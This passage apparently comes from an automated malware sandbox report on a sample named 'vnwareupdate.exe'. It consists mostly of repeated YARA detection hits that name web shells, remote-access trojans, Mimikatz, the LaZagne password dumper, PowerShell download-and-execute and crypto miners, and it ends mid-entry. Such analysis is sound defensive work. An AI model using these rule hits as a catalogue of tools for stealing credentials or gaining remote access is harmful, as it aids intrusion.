0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_xtremerat_1, Description: Yara detected Xtreme RAT, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_PupyRAT, Description: Yara detected PupyRAT, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Joe Security Rule: dragos_crashoverride_moduleStrings, Description: IEC-104 Interaction Module Program Strings, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Dragos Inc Rule: Obfuscated_VBS_April17, Description: Detects cloaked Mimikatz in VBS obfuscation, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Obfuscated_JS_April17, Description: Detects cloaked Mimikatz in JS obfuscation, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 0000000A.00000003.324570617.0000000006668000.00000004.00000001.sdmp, Author: Florian Roth Rule: scanarator, Description: Auto-generated rule on file scanarator.exe, Source: 0000000A.00000003.323986177.0000000002E7D000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: webshell_webshells_new_PHP1, Description: Web shells - generated from file PHP1.php, Source: 0000000A.00000003.323415245.0000000006628000.00000004.00000001.sdmp, Author: Florian Roth Rule: h4ntu_shell__powered_by_tsoi_, Description: Semi-Auto-generated - file h4ntu shell [powered by tsoi, Source: 0000000A.00000003.323415245.0000000006628000.00000004.00000001.sdmp, Author: unknown Rule: FVEY_ShadowBroker_Auct_Dez16_Strings, Description: String from the ShodowBroker Files Screenshots - Dec 2016, Source: 0000000A.00000003.313108656.0000000006641000.00000004.00000001.sdmp, Author: Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000002.552309239.00000000036C7000.00000004.00000001.sdmp, Author: unknown Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp, Author: unknown Rule: webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat, Description: Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php, Source: 0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp, Author: Florian Roth Rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php, Description: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, Source: 0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Empire_Invoke_Shellcode, Description: Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1, Source: 0000000A.00000003.325437911.0000000006654000.00000004.00000001.sdmp, Author: Florian Roth Rule: Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php, Description: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt, Source: 0000000A.00000003.325437911.0000000006654000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: webshell_jsp_cmdjsp, Description: Web Shell - file cmdjsp.jsp, Source: 0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_sig_404super, Description: Web shells - generated from file 404super.php, Source: 0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_Asp, Description: Web shells - generated from file Asp.asp, Source: 0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp, Author: Florian Roth Rule: Volgmer_Malware, Description: Detects Volgmer malware as reported in US CERT TA17-318B, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: ProcessInjector_Gen, Description: Detects a process injection utility that can be used ofr good and bad purposes, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: Lazagne_PW_Dumper, Description: Detects Lazagne PW Dumper, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Markus Neis / Florian Roth Rule: SUSP_shellpop_Bash, Description: Detects susupicious bash command, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Tobias Michalski Rule: GoldDragon_Aux_File, Description: Detects export from Gold Dragon - February 2018, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: VBS_dropper_script_Dec17_1, Description: Detects a supicious VBS script that drops an executable, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: Lazarus_Dec_17_5, Description: Detects Lazarus malware from incident in Dec 2017, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_Turla_Agent_BTZ_Gen_1, Description: Detects Turla Agent.BTZ, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: Suspicious_BAT_Strings, Description: Detects a string also used in Netwire RAT auxilliary, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: Turla_Mal_Script_Jan18_1, Description: Detects Turla malicious script, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: VBS_Obfuscated_Mal_Feb18_1, Description: Detects malicious obfuscated VBS observed in February 2018, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_ScanCopyPDF_Feb18, Description: Auto-generated rule - file Scan Copy.pdf.com, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: Armitage_msfconsole, Description: Detects Armitage component, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: Armitage_OSX, Description: Detects Armitage component, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: Silence_malware_2, Description: Detects malware sample mentioned in the Silence report on Securelist, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_Mimikatz, Description: Detects Invoke-Mimikatz String, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: MAL_unspecified_Jan18_1, Description: Detects unspecified malware sample, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Florian Roth Rule: malware_apt15_royaldll, Description: DLL implant, originally rights.dll and runs as a service, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: David Cannings Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebMonitor, Description: Yara detected WebMonitor RAT, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MiniRAT, Description: Yara detected Mini RAT, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ComRAT_XORKey, Description: Yara detected Turla ComRAT XORKey, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: Joe Security Rule: netwire, Description: detect netwire in memory, Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 0000000A.00000003.312268650.0000000006667000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_Invoke_Shellcode, Description: Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1, Source: 0000000A.00000003.324870228.0000000006654000.00000004.00000001.sdmp, Author: Florian Roth Rule: Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php, Description: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt, Source: 0000000A.00000003.324870228.0000000006654000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.324781029.00000000068E9000.00000004.00000001.sdmp, Author: unknown Rule: shankar_php_php, Description: Semi-Auto-generated - file shankar.php.php.txt, Source: 0000000A.00000003.325135478.0000000006854000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.324504797.0000000006892000.00000004.00000001.sdmp, Author: unknown Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.325168966.0000000006892000.00000004.00000001.sdmp, Author: unknown Rule: FVEY_ShadowBroker_Auct_Dez16_Strings, Description: String from the ShodowBroker Files Screenshots - Dec 2016, Source: 0000000A.00000003.312103557.0000000006629000.00000004.00000001.sdmp, Author: Florian Roth Rule: scanarator, Description: Auto-generated rule on file scanarator.exe, Source: 0000000A.00000002.536292107.0000000002E75000.00000004.00000040.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: Empire_Invoke_Shellcode, Description: Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1, Source: 0000000A.00000003.312201086.0000000006654000.00000004.00000001.sdmp, Author: Florian Roth Rule: Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php, Description: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt, Source: 0000000A.00000003.312201086.0000000006654000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp, Author: unknown Rule: webshell_jsp_cmdjsp, Description: Web Shell - file cmdjsp.jsp, Source: 0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_sig_404super, Description: Web shells - generated from file 404super.php, Source: 0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_Asp, Description: Web shells - generated from file Asp.asp, Source: 0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp, Author: Florian Roth Rule: shankar_php_php, Description: Semi-Auto-generated - file shankar.php.php.txt, Source: 0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp, Author: unknown Rule: webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat, Description: Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php, Source: 0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp, Author: Florian Roth Rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php, Description: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, Source: 0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: FVEY_ShadowBroker_Auct_Dez16_Strings, Description: String from the ShodowBroker Files Screenshots - Dec 2016, Source: 0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit, Description: Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php, Source: 0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_PHP1, Description: Web shells - generated from file PHP1.php, Source: 0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp, Author: Florian Roth Rule: h4ntu_shell__powered_by_tsoi_, Description: Semi-Auto-generated - file h4ntu shell [powered by tsoi, Source: 0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp, Author: unknown Rule: WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit, Description: PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php, Source: 0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp, Author: Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.316499473.0000000006860000.00000004.00000001.sdmp, Author: unknown Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000002.523349455.00000000022DB000.00000004.00000001.sdmp, Author: unknown Rule: scanarator, Description: Auto-generated rule on file scanarator.exe, Source: 0000000A.00000002.523349455.00000000022DB000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: shankar_php_php, Description: Semi-Auto-generated - file shankar.php.php.txt, Source: 0000000A.00000003.322872020.0000000006854000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.323493568.00000000068EC000.00000004.00000001.sdmp, Author: unknown Rule: SQLMap, Description: This signature detects the SQLMap SQL injection tool, Source: 0000000A.00000003.323493568.00000000068EC000.00000004.00000001.sdmp, Author: Florian Roth Rule: PortRacer, Description: Auto-generated rule on file PortRacer.exe, Source: 0000000A.00000003.323493568.00000000068EC000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.322972936.00000000050C1000.00000004.00000001.sdmp, Author: unknown Rule: webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat, Description: Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php, Source: 0000000A.00000003.322972936.00000000050C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php, Description: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, Source: 0000000A.00000003.322972936.00000000050C1000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Empire_Invoke_Shellcode, Description: Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1, Source: 0000000A.00000003.312897828.0000000006654000.00000004.00000001.sdmp, Author: Florian Roth Rule: Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php, Description: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt, Source: 0000000A.00000003.312897828.0000000006654000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: scanarator, Description: Auto-generated rule on file scanarator.exe, Source: 0000000A.00000003.325067585.0000000002E7E000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: Volgmer_Malware, Description: Detects Volgmer malware as reported in US CERT TA17-318B, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: ProcessInjector_Gen, Description: Detects a process injection utility that can be used ofr good and bad purposes, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: Lazagne_PW_Dumper, Description: Detects Lazagne PW Dumper, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Markus Neis / Florian Roth Rule: SUSP_shellpop_Bash, Description: Detects susupicious bash command, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Tobias Michalski Rule: GoldDragon_Aux_File, Description: Detects export from Gold Dragon - February 2018, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: VBS_dropper_script_Dec17_1, Description: Detects a supicious VBS script that drops an executable, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: Lazarus_Dec_17_5, Description: Detects Lazarus malware from incident in Dec 2017, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_Turla_Agent_BTZ_Gen_1, Description: Detects Turla Agent.BTZ, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: Suspicious_BAT_Strings, Description: Detects a string also used in Netwire RAT auxilliary, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: Turla_Mal_Script_Jan18_1, Description: Detects Turla malicious script, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: VBS_Obfuscated_Mal_Feb18_1, Description: Detects malicious obfuscated VBS observed in February 2018, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_ScanCopyPDF_Feb18, Description: Auto-generated rule - file Scan Copy.pdf.com, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: Armitage_msfconsole, Description: Detects Armitage component, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: Armitage_OSX, Description: Detects Armitage component, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: Silence_malware_2, Description: Detects malware sample mentioned in the Silence report on Securelist, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_Mimikatz, Description: Detects Invoke-Mimikatz String, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: MAL_unspecified_Jan18_1, Description: Detects unspecified malware sample, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Florian Roth Rule: malware_apt15_royaldll, Description: DLL implant, originally rights.dll and runs as a service, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: David Cannings Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebMonitor, Description: Yara detected WebMonitor RAT, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MiniRAT, Description: Yara detected Mini RAT, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ComRAT_XORKey, Description: Yara detected Turla ComRAT XORKey, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: Joe Security Rule: netwire, Description: detect netwire in memory, Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.318347743.00000000068C2000.00000004.00000001.sdmp, Author: unknown Rule: SQLMap, Description: This signature detects the SQLMap SQL injection tool, Source: 0000000A.00000003.318347743.00000000068C2000.00000004.00000001.sdmp, Author: Florian Roth Rule: PortRacer, Description: Auto-generated rule on file PortRacer.exe, Source: 0000000A.00000003.318347743.00000000068C2000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.316560246.00000000068A5000.00000004.00000001.sdmp, Author: unknown Rule: SQLMap, Description: This signature detects the SQLMap SQL injection tool, Source: 0000000A.00000003.316560246.00000000068A5000.00000004.00000001.sdmp, Author: Florian Roth Rule: PortRacer, Description: Auto-generated rule on file PortRacer.exe, Source: 0000000A.00000003.316560246.00000000068A5000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: FVEY_ShadowBroker_Auct_Dez16_Strings, Description: String from the ShodowBroker Files Screenshots - Dec 2016, Source: 0000000A.00000003.313078570.000000000661F000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit, Description: Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php, Source: 0000000A.00000003.313078570.000000000661F000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_PHP1, Description: Web shells - generated from file PHP1.php, Source: 0000000A.00000003.313078570.000000000661F000.00000004.00000001.sdmp, Author: Florian Roth Rule: h4ntu_shell__powered_by_tsoi_, Description: Semi-Auto-generated - file h4ntu shell [powered by tsoi, Source: 0000000A.00000003.313078570.000000000661F000.00000004.00000001.sdmp, Author: unknown Rule: WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit, Description: PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php, Source: 0000000A.00000003.313078570.000000000661F000.00000004.00000001.sdmp, Author: Florian Roth Rule: scanarator, Description: Auto-generated rule on file scanarator.exe, Source: 0000000A.00000003.308116996.0000000002E7C000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: vnwareupdate.exe PID: 7044 Parent PID: 2540

General

Start time:	13:46:45
Start date:	02/04/2021
Path:	C:\Users\user\Desktop\vnwareupdate.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1256'
Imagebase:	0x400000
File size:	10752 bytes
MD5 hash:	FA8AFFACE280644885152DE7CD3234EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000013.00000003.473985141.0000000006BA5000.00000004.00000001.sdmp, Author: Florian Roth Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000013.00000003.428708026.0000000006BA5000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_PHP_b37, Description: Web Shell - file b37.php, Source: 00000013.00000003.436058475.0000000006B94000.00000004.00000001.sdmp, Author: Florian Roth Rule: multiple_webshells_0015, Description: Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt, Source: 00000013.00000003.445137935.0000000006BFE000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Webshell_27_9_acid_c99_locus7s, Description: Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt, Source: 00000013.00000003.445137935.0000000006BFE000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp, Author: Florian Roth Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000013.00000003.464557374.0000000006D87000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_h6ss, Description: Web Shell - file h6ss.php, Source: 00000013.00000003.464557374.0000000006D87000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_Lazagne_Gen_18, Description: Detects Lazagne password extractor hacktool, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_NoPowerShell, Description: Detects NoPowerShell hack tool, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_LNX_Pnscan, Description: Detects Pnscan port scanner, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Script_Obfuscation_Char_Concat, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Netsh_PortProxy_Command, Description: Detects a suspicious command line with netsh and the portproxy command, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: VUL_JQuery_FileUpload_CVE_2018_9206, Description: Detects JQuery File Upload vulnerability CVE-2018-9206, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_FIN7_Strings_Aug18_1, Description: Detects strings from FIN7 report in August 2018, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_FIN7_MalDoc_Aug18_1, Description: Detects malicious Doc from FIN7 campaign, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_PowerKatz_Feb19_1, Description: Detetcs a tool used in the Australian Parliament House network compromise, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_Unknown_Feb19_1, Description: Detetcs a tool used in the Australian Parliament House network compromise, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_APT34_PS_Malware_Apr19_1, Description: Detects APT34 PowerShell malware, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_APT34_PS_Malware_Apr19_2, Description: Detects APT34 PowerShell malware, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_APT34_PS_Malware_Apr19_3, Description: Detects APT34 PowerShell malware, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: PUA_CryptoMiner_Jan19_1, Description: Detects Crypto Miner strings, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_Dsniff, Description: Detects Dsniff hack tool, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_1, Description: Detects HOPLIGHT malware used by HiddenCobra APT group, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CryptoMiner, Description: Yara detected Crypto Miner, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Mirai_6, Description: Yara detected Mirai, Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, Author: Joe Security Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000013.00000003.461202031.0000000006E05000.00000004.00000001.sdmp, Author: unknown Rule: SQLMap, Description: This signature detects the SQLMap SQL injection tool, Source: 00000013.00000003.461202031.0000000006E05000.00000004.00000001.sdmp, Author: Florian Roth Rule: 